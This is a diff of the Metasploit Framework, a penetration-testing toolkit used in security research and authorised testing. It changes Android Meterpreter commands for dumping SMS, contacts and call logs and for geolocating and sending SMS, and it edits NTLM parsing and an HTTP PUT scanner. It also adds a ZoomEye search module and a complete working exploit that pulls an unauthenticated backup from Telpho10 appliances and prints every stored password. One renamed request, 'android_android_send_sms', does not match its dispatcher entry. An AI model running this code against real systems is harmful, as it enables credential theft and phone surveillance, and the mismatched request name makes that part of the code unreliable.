"\xeb\x06" + Rex::Text.rand_text(2, badchars) + [ handler ].pack('V')
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
attr_accessor :badchars, :space, :nop # :nodoc:
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -1,13 +0,0 @@
|
|||
#!/usr/bin/perl
|
||||
use strict;
|
||||
|
||||
|
||||
foreach my $f ('atime', 'blockdev?', 'chardev?', 'ctime', 'directory?',
|
||||
'executable?', 'executable_real?', 'file?', 'ftype', 'grpowned?',
|
||||
'mtime', 'owned?', 'pipe?', 'readable?', 'readable_real?', 'setuid?',
|
||||
'setgid?', 'size', 'socket?', 'sticky?', 'symlink?', 'writeable?',
|
||||
'writeable_real?', 'zero?') {
|
||||
|
||||
my $t = "\t";
|
||||
print "${t}def File.$f(name)\n\t${t}stat(name).$f\n${t}end\n";
|
||||
}
|
|
@ -66,20 +66,20 @@ class Android < Extension
|
|||
end
|
||||
|
||||
def device_shutdown(n)
|
||||
request = Packet.create_request('device_shutdown')
|
||||
request = Packet.create_request('android_device_shutdown')
|
||||
request.add_tlv(TLV_TYPE_SHUTDOWN_TIMER, n)
|
||||
response = client.send_request(request)
|
||||
response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
|
||||
end
|
||||
|
||||
def set_audio_mode(n)
|
||||
request = Packet.create_request('set_audio_mode')
|
||||
request = Packet.create_request('android_set_audio_mode')
|
||||
request.add_tlv(TLV_TYPE_AUDIO_MODE, n)
|
||||
response = client.send_request(request)
|
||||
end
|
||||
|
||||
def interval_collect(opts)
|
||||
request = Packet.create_request('interval_collect')
|
||||
request = Packet.create_request('android_interval_collect')
|
||||
request.add_tlv(TLV_TYPE_COLLECT_ACTION, COLLECT_ACTIONS[opts[:action]])
|
||||
request.add_tlv(TLV_TYPE_COLLECT_TYPE, COLLECT_TYPES[opts[:type]])
|
||||
request.add_tlv(TLV_TYPE_COLLECT_TIMEOUT, opts[:timeout])
|
||||
|
@ -182,7 +182,7 @@ class Android < Extension
|
|||
|
||||
def dump_sms
|
||||
sms = []
|
||||
request = Packet.create_request('dump_sms')
|
||||
request = Packet.create_request('android_dump_sms')
|
||||
response = client.send_request(request)
|
||||
|
||||
response.each(TLV_TYPE_SMS_GROUP) do |p|
|
||||
|
@ -199,7 +199,7 @@ class Android < Extension
|
|||
|
||||
def dump_contacts
|
||||
contacts = []
|
||||
request = Packet.create_request('dump_contacts')
|
||||
request = Packet.create_request('android_dump_contacts')
|
||||
response = client.send_request(request)
|
||||
|
||||
response.each(TLV_TYPE_CONTACT_GROUP) do |p|
|
||||
|
@ -214,7 +214,7 @@ class Android < Extension
|
|||
|
||||
def geolocate
|
||||
loc = []
|
||||
request = Packet.create_request('geolocate')
|
||||
request = Packet.create_request('android_geolocate')
|
||||
response = client.send_request(request)
|
||||
|
||||
loc << {
|
||||
|
@ -227,7 +227,7 @@ class Android < Extension
|
|||
|
||||
def dump_calllog
|
||||
log = []
|
||||
request = Packet.create_request('dump_calllog')
|
||||
request = Packet.create_request('android_dump_calllog')
|
||||
response = client.send_request(request)
|
||||
|
||||
response.each(TLV_TYPE_CALLLOG_GROUP) do |p|
|
||||
|
@ -243,13 +243,13 @@ class Android < Extension
|
|||
end
|
||||
|
||||
def check_root
|
||||
request = Packet.create_request('check_root')
|
||||
request = Packet.create_request('android_check_root')
|
||||
response = client.send_request(request)
|
||||
response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
|
||||
end
|
||||
|
||||
def activity_start(uri)
|
||||
request = Packet.create_request('activity_start')
|
||||
request = Packet.create_request('android_activity_start')
|
||||
request.add_tlv(TLV_TYPE_URI_STRING, uri)
|
||||
response = client.send_request(request)
|
||||
if response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value
|
||||
|
@ -260,13 +260,13 @@ class Android < Extension
|
|||
end
|
||||
|
||||
def set_wallpaper(data)
|
||||
request = Packet.create_request('set_wallpaper')
|
||||
request = Packet.create_request('android_set_wallpaper')
|
||||
request.add_tlv(TLV_TYPE_WALLPAPER_DATA, data)
|
||||
response = client.send_request(request)
|
||||
end
|
||||
|
||||
def send_sms(dest, body, dr)
|
||||
request = Packet.create_request('send_sms')
|
||||
request = Packet.create_request('android_android_send_sms')
|
||||
request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest)
|
||||
request.add_tlv(TLV_TYPE_SMS_BODY, body)
|
||||
request.add_tlv(TLV_TYPE_SMS_DR, dr)
|
||||
|
@ -283,7 +283,7 @@ class Android < Extension
|
|||
end
|
||||
|
||||
def wlan_geolocate
|
||||
request = Packet.create_request('wlan_geolocate')
|
||||
request = Packet.create_request('android_wlan_geolocate')
|
||||
response = client.send_request(request, 30)
|
||||
networks = []
|
||||
response.each(TLV_TYPE_WLAN_GROUP) do |p|
|
||||
|
@ -297,7 +297,7 @@ class Android < Extension
|
|||
end
|
||||
|
||||
def sqlite_query(dbname, query, writeable)
|
||||
request = Packet.create_request('sqlite_query')
|
||||
request = Packet.create_request('android_sqlite_query')
|
||||
request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname)
|
||||
request.add_tlv(TLV_TYPE_SQLITE_QUERY, query)
|
||||
request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable)
|
||||
|
|
|
@ -101,6 +101,15 @@ class Config
|
|||
value
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the target's local system date and time.
|
||||
#
|
||||
def localtime
|
||||
request = Packet.create_request('stdapi_sys_config_localtime')
|
||||
response = client.send_request(request)
|
||||
(response.get_tlv_value(TLV_TYPE_LOCAL_DATETIME) || "").strip
|
||||
end
|
||||
|
||||
#
|
||||
# Returns a hash of information about the remote computer.
|
||||
#
|
||||
|
|
|
@ -129,6 +129,7 @@ TLV_TYPE_LANG_SYSTEM = TLV_META_TYPE_STRING | 1044
|
|||
TLV_TYPE_SID = TLV_META_TYPE_STRING | 1045
|
||||
TLV_TYPE_DOMAIN = TLV_META_TYPE_STRING | 1046
|
||||
TLV_TYPE_LOGGED_ON_USER_COUNT = TLV_META_TYPE_UINT | 1047
|
||||
TLV_TYPE_LOCAL_DATETIME = TLV_META_TYPE_STRING | 1048
|
||||
|
||||
# Environment
|
||||
TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100
|
||||
|
|
|
@ -36,18 +36,18 @@ class Console::CommandDispatcher::Android
|
|||
}
|
||||
|
||||
reqs = {
|
||||
'dump_sms' => ['dump_sms'],
|
||||
'dump_contacts' => ['dump_contacts'],
|
||||
'geolocate' => ['geolocate'],
|
||||
'dump_calllog' => ['dump_calllog'],
|
||||
'check_root' => ['check_root'],
|
||||
'device_shutdown' => ['device_shutdown'],
|
||||
'send_sms' => ['send_sms'],
|
||||
'wlan_geolocate' => ['wlan_geolocate'],
|
||||
'interval_collect' => ['interval_collect'],
|
||||
'activity_start' => ['activity_start'],
|
||||
'sqlite_query' => ['sqlite_query'],
|
||||
'set_audio_mode' => ['set_audio_mode']
|
||||
'dump_sms' => ['android_dump_sms'],
|
||||
'dump_contacts' => ['android_dump_contacts'],
|
||||
'geolocate' => ['android_geolocate'],
|
||||
'dump_calllog' => ['android_dump_calllog'],
|
||||
'check_root' => ['android_check_root'],
|
||||
'device_shutdown' => ['android_device_shutdown'],
|
||||
'send_sms' => ['android_send_sms'],
|
||||
'wlan_geolocate' => ['android_wlan_geolocate'],
|
||||
'interval_collect' => ['android_interval_collect'],
|
||||
'activity_start' => ['android_activity_start'],
|
||||
'sqlite_query' => ['android_sqlite_query'],
|
||||
'set_audio_mode' => ['android_set_audio_mode']
|
||||
}
|
||||
|
||||
# Ensure any requirements of the command are met
|
||||
|
|
|
@ -101,6 +101,7 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
"steal_token" => "Attempts to steal an impersonation token from the target process",
|
||||
"suspend" => "Suspends or resumes a list of processes",
|
||||
"sysinfo" => "Gets information about the remote system, such as OS",
|
||||
"localtime" => "Displays the target system's local date and time",
|
||||
}
|
||||
reqs = {
|
||||
"clearev" => [ "stdapi_sys_eventlog_open", "stdapi_sys_eventlog_clear" ],
|
||||
|
@ -135,6 +136,7 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
"steal_token" => [ "stdapi_sys_config_steal_token" ],
|
||||
"suspend" => [ "stdapi_sys_process_attach"],
|
||||
"sysinfo" => [ "stdapi_sys_config_sysinfo" ],
|
||||
"localtime" => [ "stdapi_sys_config_localtime" ],
|
||||
}
|
||||
|
||||
all.delete_if do |cmd, desc|
|
||||
|
@ -820,6 +822,14 @@ class Console::CommandDispatcher::Stdapi::Sys
|
|||
return true
|
||||
end
|
||||
|
||||
#
|
||||
# Displays the local date and time at the remote system location.
|
||||
#
|
||||
def cmd_localtime(*args)
|
||||
print_line("Local Date/Time: " + client.sys.config.localtime);
|
||||
return true
|
||||
end
|
||||
|
||||
#
|
||||
# Shuts down the remote computer.
|
||||
#
|
||||
|
|
|
@ -397,16 +397,24 @@ class Utils
|
|||
case atype
|
||||
when 1
|
||||
#netbios name
|
||||
data[:default_name] = addr.gsub("\x00", '')
|
||||
temp_name = addr
|
||||
temp_name.force_encoding("UTF-16LE")
|
||||
data[:default_name] = temp_name.encode("UTF-8")
|
||||
when 2
|
||||
#netbios domain
|
||||
data[:default_domain] = addr.gsub("\x00", '')
|
||||
temp_domain = addr
|
||||
temp_domain.force_encoding("UTF-16LE")
|
||||
data[:default_domain] = temp_domain.encode("UTF-8")
|
||||
when 3
|
||||
#dns name
|
||||
data[:dns_host_name] = addr.gsub("\x00", '')
|
||||
temp_dns = addr
|
||||
temp_dns.force_encoding("UTF-16LE")
|
||||
data[:dns_host_name] = temp_dns.encode("UTF-8")
|
||||
when 4
|
||||
#dns domain
|
||||
data[:dns_domain_name] = addr.gsub("\x00", '')
|
||||
temp_dns_domain = addr
|
||||
temp_dns_domain.force_encoding("UTF-16LE")
|
||||
data[:dns_domain_name] = temp_dns_domain.encode("UTF-8")
|
||||
when 5
|
||||
#The FQDN of the forest.
|
||||
when 6
|
||||
|
|
|
@ -760,7 +760,13 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
|
|||
|
||||
self.peer_native_os = info[0]
|
||||
self.peer_native_lm = info[1]
|
||||
#
|
||||
# if the PC belongs to a domain, this value is already populated
|
||||
# if it is not populated, we're in a workgroup and need to pupulate it now
|
||||
#
|
||||
if self.default_domain.nil?
|
||||
self.default_domain = info[2]
|
||||
end
|
||||
|
||||
return ack
|
||||
end
|
||||
|
@ -906,7 +912,13 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils
|
|||
#dns name
|
||||
self.dns_host_name = blob_data[:dns_host_name] || ''
|
||||
#dns domain
|
||||
self.dns_domain_name = blob_data[:dns_domain_name] || ''
|
||||
if blob_data[:default_name] != blob_data[:default_domain]
|
||||
# We're in a domain; get the domain name now
|
||||
self.default_domain = blob_data[:default_domain] || ''
|
||||
else
|
||||
# We're in a workgroup; workgroup names come later in the handshake
|
||||
self.default_domain = nil
|
||||
end
|
||||
|
||||
type3 = @ntlm_client.init_context([blob].pack('m'))
|
||||
type3_blob = type3.serialize
|
||||
|
|
|
@ -1,14 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rex/registry/hive'
|
||||
require 'rex/registry/regf'
|
||||
require 'rex/registry/nodekey'
|
||||
require 'rex/registry/lfkey'
|
||||
require 'rex/registry/valuekey'
|
||||
require 'rex/registry/valuelist'
|
||||
|
||||
module Rex
|
||||
module Registry
|
||||
|
||||
attr_accessor :alias
|
||||
end
|
||||
end
|
|
@ -1,96 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
#
|
||||
# Zip library
|
||||
#
|
||||
# Written by Joshua J. Drake <jduck [at] metasploit.com>
|
||||
#
|
||||
# Based on code contributed by bannedit, and the following SPEC:
|
||||
# Reference: http://www.pkware.com/documents/casestudies/APPNOTE.TXT
|
||||
#
|
||||
|
||||
require 'zlib'
|
||||
|
||||
module Rex
|
||||
module Zip
|
||||
|
||||
ZIP_VERSION = 0x14
|
||||
|
||||
# general purpose bit flag values
|
||||
#
|
||||
# bit 0
|
||||
GPBF_ENCRYPTED = 0x0001
|
||||
# bits 1 & 2
|
||||
# implode only
|
||||
GPBF_IMP_8KDICT = 0x0002
|
||||
GPBF_IMP_3SFT = 0x0004
|
||||
# deflate only
|
||||
GPBF_DEF_MAX = 0x0002
|
||||
GPBF_DEF_FAST = 0x0004
|
||||
GPBF_DEF_SUPERFAST = 0x0006
|
||||
# lzma only
|
||||
GPBF_LZMA_EOSUSED = 0x0002
|
||||
# bit 3
|
||||
GPBF_USE_DATADESC = 0x0008
|
||||
# bit 4
|
||||
GPBF_DEF_ENHANCED = 0x0010
|
||||
# bit 5
|
||||
GPBF_COMP_PATHCED = 0x0020
|
||||
# bit 6
|
||||
GPBF_STRONG_ENC = 0x0040
|
||||
# bit 7-10 unused
|
||||
# bit 11
|
||||
GPBF_STRS_UTF8 = 0x0800
|
||||
# bit 12 (reserved)
|
||||
# bit 13
|
||||
GPBF_DIR_ENCRYPTED = 0x2000
|
||||
# bit 14,15 (reserved)
|
||||
|
||||
|
||||
# compression methods
|
||||
CM_STORE = 0
|
||||
CM_SHRINK = 1
|
||||
CM_REDUCE1 = 2
|
||||
CM_REDUCE2 = 3
|
||||
CM_REDUCE3 = 4
|
||||
CM_REDUCE4 = 5
|
||||
CM_IMPLODE = 6
|
||||
CM_TOKENIZE = 7
|
||||
CM_DEFLATE = 8
|
||||
CM_DEFLATE64 = 9
|
||||
CM_PKWARE_IMPLODE = 10
|
||||
# 11 - reserved
|
||||
CM_BZIP2 = 12
|
||||
# 13 - reserved
|
||||
CM_LZMA_EFS = 14
|
||||
# 15-17 reserved
|
||||
CM_IBM_TERSE = 18
|
||||
CM_IBM_LZ77 = 19
|
||||
# 20-96 reserved
|
||||
CM_WAVPACK = 97
|
||||
CM_PPMD_V1R1 = 98
|
||||
|
||||
|
||||
# internal file attributes
|
||||
IFA_ASCII = 0x0001
|
||||
# bits 2 & 3 are reserved
|
||||
IFA_MAINFRAME_MODE = 0x0002 # ??
|
||||
|
||||
|
||||
# external file attributes
|
||||
EFA_ISDIR = 0x0001
|
||||
|
||||
|
||||
# various parts of the structure
|
||||
require 'rex/zip/blocks'
|
||||
|
||||
# an entry in a zip file
|
||||
require 'rex/zip/entry'
|
||||
|
||||
# the archive class
|
||||
require 'rex/zip/archive'
|
||||
|
||||
# a child of Archive, implements Java ARchives for creating java applications
|
||||
require 'rex/zip/jar'
|
||||
|
||||
end
|
||||
end
|
|
@ -65,9 +65,9 @@ Gem::Specification.new do |spec|
|
|||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.1.19'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.1.26'
|
||||
# Needed for the next-generation POSIX Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.0.6'
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.0.8'
|
||||
# Needed by msfgui and other rpc components
|
||||
spec.add_runtime_dependency 'msgpack'
|
||||
# get list of network interfaces, like eth* from OS.
|
||||
|
@ -145,6 +145,8 @@ Gem::Specification.new do |spec|
|
|||
spec.add_runtime_dependency 'rex-rop_builder'
|
||||
# Library for polymorphic encoders; used for payload encoding
|
||||
spec.add_runtime_dependency 'rex-encoder'
|
||||
# Library for exploit development helpers
|
||||
spec.add_runtime_dependency 'rex-exploitation'
|
||||
|
||||
# rb-readline doesn't work with Ruby Installer due to error with Fiddle:
|
||||
# NoMethodError undefined method `dlopen' for Fiddle:Module
|
||||
|
|
|
@ -0,0 +1,159 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rubygems/package'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Telpho10 Backup Credentials Dumper',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Telpho10 telephone system
|
||||
appliance. This module generates a configuration backup of Telpho10,
|
||||
downloads the file and dumps the credentials for admin login,
|
||||
phpmyadmin, phpldapadmin, etc.
|
||||
This module has been successfully tested on the appliance.
|
||||
},
|
||||
'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => ['URL', 'https://github.com/whoot/TelpOWN'],
|
||||
'Platform' => 'linux',
|
||||
'Targets' =>
|
||||
[
|
||||
['Telpho10 <= 2.6.31', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Sep 2 2016'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Used for unpacking backup files
|
||||
def untar(tarfile)
|
||||
destination = tarfile.split('.tar').first
|
||||
FileUtils.mkdir_p(destination)
|
||||
File.open(tarfile, 'rb') do |file|
|
||||
Gem::Package::TarReader.new(file) do |tar|
|
||||
tar.each do |entry|
|
||||
dest = File.join destination, entry.full_name
|
||||
if entry.file?
|
||||
File.open(dest, 'wb') do |f|
|
||||
f.write(entry.read)
|
||||
end
|
||||
File.chmod(entry.header.mode, dest)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
return destination
|
||||
end
|
||||
|
||||
# search for credentials in backup file
|
||||
def dump_creds(mysql_file)
|
||||
file = File.new(mysql_file, 'r')
|
||||
while (line = file.gets)
|
||||
if line.include? 'adminusername'
|
||||
config = [line]
|
||||
end
|
||||
end
|
||||
file.close
|
||||
|
||||
print_status('Login (/telpho/login.php)')
|
||||
print_status('-------------------------')
|
||||
print_good("Username: #{config.first[/adminusername\',\'(.*?)\'/, 1]}")
|
||||
print_good("Password: #{config.first[/adminpassword\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
print_status('MySQL (/phpmyadmin)')
|
||||
print_status('-------------------')
|
||||
print_good('Username: root')
|
||||
print_good("Password: #{config.first[/dbpassword\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
print_status('LDAP (/phpldapadmin)')
|
||||
print_status('--------------------')
|
||||
print_good('Username: cn=admin,dc=localdomain')
|
||||
print_good("Password: #{config.first[/ldappassword\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
print_status('Asterisk MI (port 5038)')
|
||||
print_status('-----------------------')
|
||||
print_good("Username: #{config.first[/manageruser\',\'(.*?)\'/, 1]}")
|
||||
print_good("Password: #{config.first[/managersecret\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
print_status('Mail configuration')
|
||||
print_status('------------------')
|
||||
print_good("Mailserver: #{config.first[/ipsmarthost\',\'(.*?)\'/, 1]}")
|
||||
print_good("Username: #{config.first[/mailusername\',\'(.*?)\'/, 1]}")
|
||||
print_good("Password: #{config.first[/mailpassword\',\'(.*?)\'/, 1]}")
|
||||
print_good("Mail from: #{config.first[/mailfrom\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
print_status('Online Backup')
|
||||
print_status('-------------')
|
||||
print_good("ID: #{config.first[/ftpbackupid\',\'(.*?)\'/, 1]}")
|
||||
print_good("Password: #{config.first[/ftpbackuppw\',\'(.*?)\'/, 1]}\n")
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
res = send_request_cgi({
|
||||
'uri' => '/telpho/system/backup.php',
|
||||
'method' => 'GET'
|
||||
})
|
||||
if res && res.code == 200
|
||||
print_status('Generating backup')
|
||||
sleep(1)
|
||||
else
|
||||
print_error("Could not find vulnerable script. Aborting.")
|
||||
return nil
|
||||
end
|
||||
|
||||
print_status('Downloading backup')
|
||||
res = send_request_cgi({
|
||||
'uri' => '/telpho/temp/telpho10.epb',
|
||||
'method' => 'GET'
|
||||
})
|
||||
if res && res.code == 200
|
||||
if res.body.to_s.bytesize == 0
|
||||
print_error('0 bytes returned, file does not exist or is empty.')
|
||||
return nil
|
||||
end
|
||||
|
||||
path = store_loot(
|
||||
'telpho10.backup',
|
||||
'application/x-compressed',
|
||||
datastore['RHOST'],
|
||||
res.body,
|
||||
'backup.tar'
|
||||
)
|
||||
print_good("File saved in: #{path}")
|
||||
|
||||
begin
|
||||
extracted = untar("#{path}")
|
||||
mysql = untar("#{extracted}/mysql.tar")
|
||||
rescue
|
||||
print_error('Could not unpack files.')
|
||||
return nil
|
||||
end
|
||||
begin
|
||||
print_status("Dumping credentials\n")
|
||||
dump_creds("#{mysql}/mysql.epb")
|
||||
rescue
|
||||
print_error('Could not find credential file.')
|
||||
return nil
|
||||
end
|
||||
else
|
||||
print_error('Failed to download backup file.')
|
||||
return nil
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("#{rhost}:#{rport} - Failed to connect")
|
||||
return nil
|
||||
end
|
||||
end
|
|
@ -0,0 +1,185 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/proto/http'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'ZoomEye Search',
|
||||
'Description' => %q{
|
||||
The module use the ZoomEye API to search ZoomEye. ZoomEye is a search
|
||||
engine for cyberspace that lets the user find specific network
|
||||
components(ip, services, etc.).
|
||||
},
|
||||
'Author' => [ 'Nixawk' ],
|
||||
'References' => [
|
||||
['URL', 'https://github.com/zoomeye/SDK'],
|
||||
['URL', 'https://www.zoomeye.org/api/doc'],
|
||||
['URL', 'https://www.zoomeye.org/help/manual']
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
deregister_options('RHOST', 'DOMAIN', 'DigestAuthIIS', 'NTLM::SendLM',
|
||||
'NTLM::SendNTLM', 'VHOST', 'RPORT', 'NTLM::SendSPN', 'NTLM::UseLMKey',
|
||||
'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2', 'SSL')
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('USERNAME', [true, 'The ZoomEye username']),
|
||||
OptString.new('PASSWORD', [true, 'The ZoomEye password']),
|
||||
OptString.new('ZOOMEYE_DORK', [true, 'The ZoomEye Dock']),
|
||||
OptEnum.new('RESOURCE', [true, 'ZoomEye Resource Type', 'host', ['host', 'web']]),
|
||||
OptInt.new('MAXPAGE', [true, 'Max amount of pages to collect', 1])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Check to see if api.zoomeye.org resolves properly
|
||||
def zoomeye_resolvable?
|
||||
begin
|
||||
Rex::Socket.resolv_to_dotted("api.zoomeye.org")
|
||||
rescue RuntimeError, SocketError
|
||||
return false
|
||||
end
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
def login(username, password)
|
||||
# See more: https://www.zoomeye.org/api/doc#login
|
||||
|
||||
access_token = ''
|
||||
@cli = Rex::Proto::Http::Client.new('api.zoomeye.org', 443, {}, true)
|
||||
@cli.connect
|
||||
|
||||
data = {'username' => username, 'password' => password}
|
||||
req = @cli.request_cgi({
|
||||
'uri' => '/user/login',
|
||||
'method' => 'POST',
|
||||
'data' => data.to_json
|
||||
})
|
||||
|
||||
res = @cli.send_recv(req)
|
||||
|
||||
unless res
|
||||
print_error('server_response_error')
|
||||
return
|
||||
end
|
||||
|
||||
records = ActiveSupport::JSON.decode(res.body)
|
||||
access_token = records['access_token'] if records && records.key?('access_token')
|
||||
access_token
|
||||
end
|
||||
|
||||
def dork_search(dork, resource, page)
|
||||
# param: dork
|
||||
# ex: country:cn
|
||||
# access https://www.zoomeye.org/search/dorks for more details.
|
||||
# param: page
|
||||
# total page(s) number
|
||||
# param: resource
|
||||
# set a search resource type, ex: [web, host]
|
||||
# param: facet
|
||||
# ex: [app, device]
|
||||
# A comma-separated list of properties to get summary information
|
||||
|
||||
begin
|
||||
req = @cli.request_cgi({
|
||||
'uri' => "/#{resource}/search",
|
||||
'method' => 'GET',
|
||||
'headers' => { 'Authorization' => "JWT #{@zoomeye_token}" },
|
||||
'vars_get' => {
|
||||
'query' => dork,
|
||||
'page' => page,
|
||||
'facet' => 'ip'
|
||||
}
|
||||
})
|
||||
|
||||
res = @cli.send_recv(req)
|
||||
|
||||
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
|
||||
print_error("HTTP Connection Failed")
|
||||
end
|
||||
|
||||
unless res
|
||||
print_error('server_response_error')
|
||||
return
|
||||
end
|
||||
|
||||
# Invalid Token, Not enough segments
|
||||
# Invalid Token, Signature has expired
|
||||
if res.body =~ /Invalid Token, /
|
||||
fail_with(Failure::BadConfig, '401 Unauthorized. Your ZOOMEYE_APIKEY is invalid')
|
||||
end
|
||||
|
||||
ActiveSupport::JSON.decode(res.body)
|
||||
end
|
||||
|
||||
def match_records?(records)
|
||||
records && records.key?('matches')
|
||||
end
|
||||
|
||||
def parse_host_records(records)
|
||||
records.each do |match|
|
||||
host = match['ip']
|
||||
port = match['portinfo']['port']
|
||||
|
||||
report_service(:host => host, :port => port)
|
||||
print_good("Host: #{host} ,PORT: #{port}")
|
||||
end
|
||||
end
|
||||
|
||||
def parse_web_records(records)
|
||||
records.each do |match|
|
||||
host = match['ip'][0]
|
||||
domains = match['domains']
|
||||
|
||||
report_host(:host => host)
|
||||
print_good("Host: #{host}, Domains: #{domains}")
|
||||
end
|
||||
end
|
||||
|
||||
def run
|
||||
# check to ensure api.zoomeye.org is resolvable
|
||||
unless zoomeye_resolvable?
|
||||
print_error("Unable to resolve api.zoomeye.org")
|
||||
return
|
||||
end
|
||||
|
||||
@zoomeye_token = login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
if @zoomeye_token.blank?
|
||||
print_error("Unable to login api.zoomeye.org")
|
||||
return
|
||||
end
|
||||
|
||||
# create ZoomEye request parameters
|
||||
dork = datastore['ZOOMEYE_DORK']
|
||||
resource = datastore['RESOURCE']
|
||||
page = 1
|
||||
maxpage = datastore['MAXPAGE']
|
||||
|
||||
# scroll max pages from ZoomEye
|
||||
while page <= maxpage
|
||||
print_status("ZoomEye #{resource} Search: #{dork} - page: #{page}")
|
||||
results = dork_search(dork, resource, page) if dork
|
||||
break unless match_records?(results)
|
||||
|
||||
matches = results['matches']
|
||||
if resource.include?('web')
|
||||
parse_web_records(matches)
|
||||
else
|
||||
parse_host_records(matches)
|
||||
end
|
||||
page += 1
|
||||
end
|
||||
end
|
||||
end
|
|
@ -11,6 +11,9 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Module::Deprecated
|
||||
|
||||
deprecated(Date.new(2016, 11, 23), 'auxiliary/scanner/discovery/udp_sweep')
|
||||
|
||||
def initialize
|
||||
super(
|
||||
|
|
|
@ -54,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
# Send a normal HTTP request and see if we successfully uploaded or deleted a file.
|
||||
# If successful, return true, otherwise false.
|
||||
#
|
||||
def file_exists(path, data)
|
||||
def file_exists(path, data, ip)
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
{
|
||||
|
@ -65,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
}, 20
|
||||
).to_s
|
||||
rescue ::Exception => e
|
||||
print_error("Error: #{e.to_s}")
|
||||
print_error("#{ip}: Error: #{e.to_s}")
|
||||
return nil
|
||||
end
|
||||
|
||||
|
@ -75,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
#
|
||||
# Do a PUT request to the server. Function returns the HTTP response.
|
||||
#
|
||||
def do_put(path, data)
|
||||
def do_put(path, data, ip)
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
{
|
||||
|
@ -86,7 +86,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
}, 20
|
||||
)
|
||||
rescue ::Exception => e
|
||||
print_error("Error: #{e.to_s}")
|
||||
print_error("#{ip}: Error: #{e.to_s}")
|
||||
return nil
|
||||
end
|
||||
|
||||
|
@ -96,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
#
|
||||
# Do a DELETE request. Function returns the HTTP response.
|
||||
#
|
||||
def do_delete(path)
|
||||
def do_delete(path, ip)
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
{
|
||||
|
@ -106,7 +106,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
}, 20
|
||||
)
|
||||
rescue ::Exception => e
|
||||
print_error("Error: #{e.to_s}")
|
||||
print_error("#{ip}: Error: #{e.to_s}")
|
||||
return nil
|
||||
end
|
||||
|
||||
|
@ -135,11 +135,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
# Upload file
|
||||
res = do_put(path, data)
|
||||
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
|
||||
res = do_put(path, data, ip)
|
||||
vprint_status("#{ip}: Reply: #{res.code.to_s}") if not res.nil?
|
||||
|
||||
# Check file
|
||||
if not res.nil? and file_exists(path, data)
|
||||
if not res.nil? and file_exists(path, data, ip)
|
||||
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
|
||||
print_good("File uploaded: #{turl}")
|
||||
report_vuln(
|
||||
|
@ -152,7 +152,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
:exploited_at => Time.now.utc
